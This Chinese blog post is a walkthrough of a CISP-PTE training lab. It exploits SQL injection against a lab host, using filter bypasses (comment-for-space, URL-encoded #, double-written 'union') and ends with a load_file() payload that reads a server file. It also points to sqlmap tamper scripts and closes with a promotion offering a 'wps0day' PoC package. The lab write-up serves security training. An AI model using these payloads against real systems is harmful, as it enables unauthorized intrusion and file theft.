题目1 SQL注入(保姆级教程)【文末有惊喜】

已于 2023-08-31 10:59:42 修改
阅读量355 收藏 3
点赞数 1
分类专栏: # CISP-PTE-Centos 文章标签: sql注入 cisp-pte cisp 靶机 安全
于 2023-07-21 10:47:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/honest_run/article/details/131846984
版权

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

命令:

2、获取到flag

猎杀时刻

        目前在GG安全公众号中回复关键字"wps0day",即可获得wps打包套件及poc。

        为了方便师傅们的交流学习,根据广大师傅们的建议,我在之后也会创建一个的群聊。预计在内部群内,我们将分享一些脱敏的漏洞报告和渗透测试实战案例,还将会有一些经验丰富的大牛和巨佬分享他们的经验。后续还将提供一些福利,例如送书和小礼物等等。欢迎师傅们到时候加入群聊,一起交流学习,致力打造一个有丰富学习氛围的小圈子。

xjizhi(GG安全)
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入讲解ppt.pptx
08-10
2. SQLi-Labs:SQL 注入的靶场,提供了不同知识点的题目,需要与 PHPStudy 结合使用。 3. Hackbar:写注入的 payload 的工具,大有用处。 4. Burpsuite:多功能的工具,可以写 payload 上传,也可以爆破。 四、...
SQL注入经典教程(珍藏版).rar
11-27
这本珍藏版教程可能会是一个全面的资源,不仅适合初学者学习SQL注入基础知识,也对有经验的开发者和安全专业人员提供有价值的见解和策略。通过深入理解和应用这些知识点,可以显著提高Web应用程序的安全性,避免...
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
sql注入基础)题解
最新发布
agoodboy6的博客
11-04 251
上述语句的结构,可以将information-schema.schemata/tables/columns看作所要查询的范围,而where后的语句作为上一步语句查询获取的信息又使得此步查询更加准确。原理:在SQL注入攻击过程中,服务器开启了错误回显,页面会返回错误信息,利用报错函数获取数据库数据。select * from member where id='$id' 字符型sql语句。初次尝试,发现显示结果不全,推测此题对回显长度有限制。table-name与table-name呼应。
CISP-PTE练习篇(基础题目一:SQL注入
wojiaoqwe的博客
01-31 1857
本文仅当作练习记录使用。
SQL注入读取文件之各种绕过姿势
小白渣的博客
02-27 1514
目录 回显判断注入点 确定过滤类型 各种绕过姿势注入  0x00环境介绍 目标地址: http://172.16.12.100:81  注入要求:通过SQL注入漏洞读取/tmp/360/key文件,答案就在文件中。    0x01渗透思路 进入答题后,显示为使用select * from article where id= ('1')...
CISP-PTE学习总结之基础练习题(二)
千寻的博客
10-20 7570
基础题目一:SQL注入 0x01 题目要求 0x02 解题过程 基础题目二:文件上传突破 0x01 题目要求 0x02 解题过程 基础题目三:文件包含 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目四:代码执行漏洞 0x01 题目要求 0x02 解题过程 0x03 解题总结 基础题目五:失效的访问控制 0x01 题目要求 0x02 解题过程
sql注入基础原理及注入方式
A906003660的博客
07-20 1171
Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。二、 SQL注入的简单流程第一步:判断目标站点,是否存在注入漏洞向页面传入一些指令(SQL语句,检查指令是否被执行,如果被执行,说明页面是可能存在SQL注入漏洞的;如果不能被执行,说明可能不存在SQL注入漏洞常用的闭合点: ''单引号""双引号第二步判断数据表的字段数量思路: order by字段编号。
sql注入基础(web安全入门08)
黑战士的博客
01-23 1860
一、SQL 简介 SQL 结构化查询语言,是一种特殊的编程语言,用于数据库中的标准数据查询语言。1986 年 10 月,美国国家标准学会对 SQL 进行规范后,以此作为关系式数据库管理系统的标准语 言。 MYSQL ACCESS MSSQL orcale 明显的层次结构 库名|表名|字段名|字段内容(像 excel 文件一样) 不过各种通行的数据库系统在其实践过程中都对 SQL 规范做了某些编改和扩充。所以实际 上不同的数据库系统之间的 SQL 不能完全通用。 SQL 注入(SQL Injection)是一
CISP-PTE考前练习-SQL注入
千寻的博客
10-17 3512
常见的SQL注入的总结
SQL注入--题目
lulu001128的博客
07-26 389
解题过程
SQL注入基础入门篇
wyp20011020的博客
03-29 215
sql注入
CISP-PTE web渗透通关攻略
DG_s1mple
12-09 1445
想考一个cisp-pte的证,最近在网上找了一下,找到一些资料,就先做了顺便把过程记录下来 这是老靶场打开页面告诉我们需要读取/tmp/360/key文件,我们把它记下来,然后点击进入答题 进入到如下界面 把sql输入的句子直接显示在页面上了,我们开始用HackerBar测试 发现输入1’)报错无法返回 输入1’)%23可以正常返回页面可以确定注入条件了,然后我们开始测试它的字段数量 发现空格被过滤了,我们使用注释来绕过/**/ 发现为4的时候页面可以正常返回,为5的时候不返回 确定字段数量为5
第一章、SQL注入基础
weixin_57679210的博客
08-08 72
3)、布尔盲注:sql服务器不会直接反馈查询内容,而是通过反馈一个布尔参数给网站服务器,然后再由网站服务器将内容反馈到浏览器,而布尔类型只有两个参数,ture和false,此时可通过配合猜解函数如if(),ascii(),length(),left(),substr()等,来判断注入操作的效果。4、最小权限原则,是一种安全性原则,指的是为了保护敏感数据和系统资源,用户被授予最小必须的权限,也就意味着用户只能访问和执行他们工作所需的数据库对象和操作,而不是拥有对整个数据库的完全访问权限。
SQL注入16】SQL漏洞利用之读写文件
Fighting_hawk的博客
02-22 4337
1. 对文件进行读写既收到文件系统对用户权限的制约、也收到数据库设置的制约。 2. 掌握利用SQL漏洞进行文件读写的方法。 3. 后续需要进一步了解如何获取网站根目录路径的方法。
SQL注入之文件读写
永远是少年
06-27 2209
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQL注入之文件读写。 一、SQL注入文件读写函数 二、SQL注入文件读写之secure_file_priv参数 三、SQL注入文件路径获取 四、SQL注入文件读写之魔术引导开关......
web漏洞-SQL注入漏洞、目录遍历漏洞、文件下载漏洞
ran的博客
01-10 1244
在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞,其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
基础题目sql注入
07-31
SQL注入是一种常见的网络安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL语句来获取或修改数据库中的数据。下面是关于SQL注入的详细解释。 SQL注入是一种利用Web应用程序对数据库进行恶意操作的攻击方式。攻击者利用应用程序没有对用户输入的数据进行足够验证和过滤的漏洞,将恶意的SQL语句插入到数据库查询中,并成功执行了这些语句。 SQL注入可以导致严重的后果,包括数据泄露、数据篡改、系统崩溃等。为了防止SQL注入,开发人员应该在编写代码时采取一些安全措施: 1. 使用参数化查询或预编译语句:这是最有效的防止SQL注入的方法。通过将输入值作为参数传递给查询语句,数据库会将输入值视为数据,而不是代码。 2. 输入验证和过滤:对用户输入的数据进行验证和过滤,只接受合法的输入字符。可以使用正则表达式或其他验证方法来检查输入数据的格式和内容。 3. 限制数据库用户权限:将数据库用户的权限限制到最低限度,只赋予其必要的操作权限。这样即使注入攻击成功,攻击者也无法执行敏感操作。 4. 避免动态构建SQL查询:尽量使用参数化查询而不是动态构建SQL查询语句。因为动态构建SQL语句容易受到注入攻击,而参数化查询可以避免这种问题。 5. 定期更新和修补软件:及时更新和修补数据库和应用程序,以确保安全漏洞被修复。 总之,SQL注入是一种常见而严重的网络安全漏洞,开发人员应该了解并采取必要的防范措施来防止这种攻击。同时,用户也需要保持警惕,避免向不受信任的应用程序提供个人敏感信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值